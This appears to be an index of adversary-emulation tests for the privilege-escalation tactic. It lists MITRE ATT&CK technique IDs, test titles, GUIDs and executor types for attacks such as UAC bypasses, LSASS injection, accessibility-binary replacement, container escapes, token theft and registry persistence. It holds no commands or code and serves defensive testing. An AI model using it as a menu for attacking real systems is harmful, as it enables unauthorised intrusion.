716 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
717 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
718 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
719 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
720 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key 85f3a526-4cfa-4fe7-98c1-dea99be025c7 powershell
721 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 25 Disable UAC notification via registry keys 160a7c77-b00e-4111-9e45-7c2a44eda3fd command_prompt
722 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 26 Disable ConsentPromptBehaviorAdmin via registry keys a768aaa2-2442-475c-8990-69cf33af0f4e command_prompt
723 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 27 UAC bypassed by Utilizing ProgIDs registry. b6f4645c-34ea-4c7c-98f2-d5a2747efb08 command_prompt
724 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
725 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Sudo usage (freebsd) 2bf9a018-4664-438a-b435-cc6f8c6f71b1 sh
726 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
727 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 4 Unlimited sudo cache timeout (freebsd) a83ad6e8-6f24-4d7f-8f44-75f8ab742991 sh
728 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 5 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
729 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 6 Disable tty_tickets for sudo caching (freebsd) 4df6a0fe-2bdd-4be8-8618-a6a19654a57a sh
730 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
731 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
732 privilege-escalation T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
733 privilege-escalation T1547 Boot or Logon Autostart Execution 2 Driver Installation Using pnputil.exe 5cb0b071-8a5a-412f-839d-116beb2ed9f7 powershell
734 privilege-escalation T1547 Boot or Logon Autostart Execution 3 Leverage Virtual Channels to execute custom DLL during successful RDP session fdd45306-74f6-4ade-9a97-0a4895961228 command_prompt
735 privilege-escalation T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
736 privilege-escalation T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
737 privilege-escalation T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
738 privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
739 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
740 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
741 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
742 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
743 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 5 Remote Service Installation CMD fb4151a2-db33-4f8c-b7f8-78ea8790f961 command_prompt
744 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 6 Modify Service to Run Arbitrary Binary (Powershell) 1f896ce4-8070-4959-8a25-2658856a70c9 powershell
745 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
746 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
747 privilege-escalation T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
748 privilege-escalation T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
749 privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
750 privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
751 privilege-escalation T1547.012 Boot or Logon Autostart Execution: Print Processors 1 Print Processors f7d38f47-c61b-47cc-a59d-fc0368f47ed0 powershell
752 privilege-escalation T1574.001 Hijack Execution Flow: DLL 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
753 privilege-escalation T1574.001 Hijack Execution Flow: DLL 2 Phantom Dll Hijacking - WinAppXRT.dll 46ed938b-c617-429a-88dc-d49b5c9ffedb command_prompt
754 privilege-escalation T1574.001 Hijack Execution Flow: DLL 3 Phantom Dll Hijacking - ualapi.dll 5898902d-c5ad-479a-8545-6f5ab3cfc87f command_prompt
755 privilege-escalation T1574.001 Hijack Execution Flow: DLL 4 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
756 privilege-escalation T1574.001 Hijack Execution Flow: DLL 5 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
757 privilege-escalation T1574.001 Hijack Execution Flow: DLL 6 DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE c095ad8e-4469-4d33-be9d-6f6d1fb21585 powershell
758 privilege-escalation T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
759 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
760 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
761 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
762 privilege-escalation T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
763 privilege-escalation T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
764 privilege-escalation T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
765 privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
766 privilege-escalation T1055 Process Injection 3 Section View Injection c6952f41-6cf0-450a-b352-2ca8dae7c178 powershell
767 privilege-escalation T1055 Process Injection 4 Dirty Vanity process Injection 49543237-25db-497b-90df-d0a0a6e8fe2c powershell
768 privilege-escalation T1055 Process Injection 5 Read-Write-Execute process Injection 0128e48e-8c1a-433a-a11a-a5387384f1e1 powershell
769 privilege-escalation T1055 Process Injection 6 Process Injection with Go using UuidFromStringA WinAPI 2315ce15-38b6-46ac-a3eb-5e21abef2545 powershell
770 privilege-escalation T1055 Process Injection 7 Process Injection with Go using EtwpCreateEtwThread WinAPI 7362ecef-6461-402e-8716-7410e1566400 powershell
771 privilege-escalation T1055 Process Injection 8 Remote Process Injection with Go using RtlCreateUserThread WinAPI a0c1725f-abcd-40d6-baac-020f3cf94ecd powershell
772 privilege-escalation T1055 Process Injection 9 Remote Process Injection with Go using CreateRemoteThread WinAPI 69534efc-d5f5-4550-89e6-12c6457b9edd powershell
773 privilege-escalation T1055 Process Injection 10 Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39 powershell
774 privilege-escalation T1055 Process Injection 11 Process Injection with Go using CreateThread WinAPI 2871ed59-3837-4a52-9107-99500ebc87cb powershell
775 privilege-escalation T1055 Process Injection 12 Process Injection with Go using CreateThread WinAPI (Natively) 2a3c7035-d14f-467a-af94-933e49fe6786 powershell
776 privilege-escalation T1055 Process Injection 13 UUID custom process Injection 0128e48e-8c1a-433a-a11a-a5304734f1e1 powershell
777 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
778 privilege-escalation T1611 Escape to Host 2 Mount host filesystem to escape privileged Docker container 6c499943-b098-4bc6-8d38-0956fc182984 sh
779 privilege-escalation T1611 Escape to Host 3 Privilege Escalation via Docker Volume Mapping 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4 sh
780 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
781 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
782 privilege-escalation T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
783 privilege-escalation T1547.005 Boot or Logon Autostart Execution: Security Support Provider 2 Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry de3f8e74-3351-4fdb-a442-265dbf231738 powershell
784 privilege-escalation T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
785 privilege-escalation T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
786 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
787 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
788 privilege-escalation T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
789 privilege-escalation T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
790 privilege-escalation T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
791 privilege-escalation T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
792 privilege-escalation T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
793 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
794 privilege-escalation T1546.005 Event Triggered Execution: Trap 2 Trap EXIT (freebsd) be1a5d70-6865-44aa-ab50-42244c9fd16f sh
795 privilege-escalation T1546.005 Event Triggered Execution: Trap 3 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
796 privilege-escalation T1546.005 Event Triggered Execution: Trap 4 Trap SIGINT (freebsd) ade10242-1eac-43df-8412-be0d4c704ada sh
797 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
798 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
799 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
800 privilege-escalation T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
801 privilege-escalation T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
802 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
803 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Make and modify binary from C source (freebsd) dd580455-d84b-481b-b8b0-ac96f3b1dc4c sh
804 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
805 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Set a SetUID flag on file (freebsd) 9be9b827-ff47-4e1b-bef8-217db6fb7283 sh
806 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
807 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Set a SetGID flag on file (freebsd) 1f73af33-62a8-4bf1-bd10-3bea931f2c0d sh
808 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
809 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 8 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
810 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 9 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
811 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 10 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
812 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
813 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
814 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
815 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
816 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
817 privilege-escalation T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc sh
818 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
819 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
820 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
821 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
822 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
823 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
824 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 4 Atbroker.exe (AT) Executes Arbitrary Command via Registry Key 444ff124-4c83-4e28-8df6-6efd3ece6bd4 command_prompt
825 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 5 Auto-start application on user logon 7125eba8-7b30-426b-9147-781d152be6fb command_prompt
826 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 6 Replace utilman.exe (Ease of Access Binary) with cmd.exe 1db380da-3422-481d-a3c8-6d5770dba580 command_prompt
827 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 7 Replace Magnify.exe (Magnifier binary) with cmd.exe 5e4fa70d-c789-470e-85e1-6992b92bb321 command_prompt
828 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 8 Replace Narrator.exe (Narrator binary) with cmd.exe 2002f5ea-cd13-4c82-bf73-e46722e5dc5e command_prompt
829 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 9 Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe 825ba8ca-71cc-436b-b1dd-ea0d5e109086 command_prompt
830 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 10 Replace AtBroker.exe (App Switcher binary) with cmd.exe 210be7ea-d841-40ec-b3e1-ff610bb62744 command_prompt
831 privilege-escalation T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
832 privilege-escalation T1055.004 Process Injection: Asynchronous Procedure Call 2 EarlyBird APC Queue Injection in Go 73785dd2-323b-4205-ab16-bb6f06677e14 powershell
833 privilege-escalation T1055.004 Process Injection: Asynchronous Procedure Call 3 Remote Process Injection with Go using NtQueueApcThreadEx WinAPI 4cc571b1-f450-414a-850f-879baf36aa06 powershell
834 privilege-escalation T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
835 privilege-escalation T1055.002 Process Injection: Portable Executable Injection 1 Portable Executable Injection 578025d5-faa9-4f6d-8390-aae739d503e1 powershell
836 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 1 Persistence by modifying Windows Terminal profile ec5d76ef-82fe-48da-b931-bdb25a62bc65 powershell
837 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
838 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
839 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
840 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
841 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
842 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 5 Juicy Potato f095e373-b936-4eb4-8d22-f47ccbfbe64a powershell
843 privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
844 privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
845 privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
846 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
847 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
848 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
849 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
850 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
851 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
852 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
853 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
854 privilege-escalation T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
855 privilege-escalation T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
856 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
857 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
858 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
859 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
860 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
861 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
862 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
863 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
864 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
865 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
866 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
867 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
868 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
869 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
870 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
871 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
872 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
873 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 18 Allowing custom application to execute during new RDP logon session b051b3c0-66e7-4a81-916d-e6383bd3a669 command_prompt
874 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 19 Creating Boot Verification Program Key for application execution during successful boot 6e1666d5-3f2b-4b9a-80aa-f011322380d4 command_prompt
875 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 20 Add persistence via Windows Context Menu de47f4a0-2acb-416d-9a6b-cee584a4c4d1 command_prompt
876 privilege-escalation T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
877 privilege-escalation T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
878 privilege-escalation T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
879 privilege-escalation T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
880 privilege-escalation T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
881 privilege-escalation T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
882 privilege-escalation T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
883 privilege-escalation T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
884 privilege-escalation T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
885 privilege-escalation T1098 Account Manipulation 10 Domain Password Policy Check: Short Password fc5f9414-bd67-4f5f-a08e-e5381e29cbd1 powershell
886 privilege-escalation T1098 Account Manipulation 11 Domain Password Policy Check: No Number in Password 68190529-069b-4ffc-a942-919704158065 powershell
887 privilege-escalation T1098 Account Manipulation 12 Domain Password Policy Check: No Special Character in Password 7d984ef2-2db2-4cec-b090-e637e1698f61 powershell
888 privilege-escalation T1098 Account Manipulation 13 Domain Password Policy Check: No Uppercase Character in Password b299c120-44a7-4d68-b8e2-8ba5a28511ec powershell
889 privilege-escalation T1098 Account Manipulation 14 Domain Password Policy Check: No Lowercase Character in Password 945da11e-977e-4dab-85d2-f394d03c5887 powershell
890 privilege-escalation T1098 Account Manipulation 15 Domain Password Policy Check: Only Two Character Classes 784d1349-5a26-4d20-af5e-d6af53bae460 powershell
891 privilege-escalation T1098 Account Manipulation 16 Domain Password Policy Check: Common Password Use 81959d03-c51f-49a1-bb24-23f1ec885578 powershell
892 privilege-escalation T1098 Account Manipulation 17 GCP - Delete Service Account Key 7ece1dea-49f1-4d62-bdcc-5801e3292510 sh
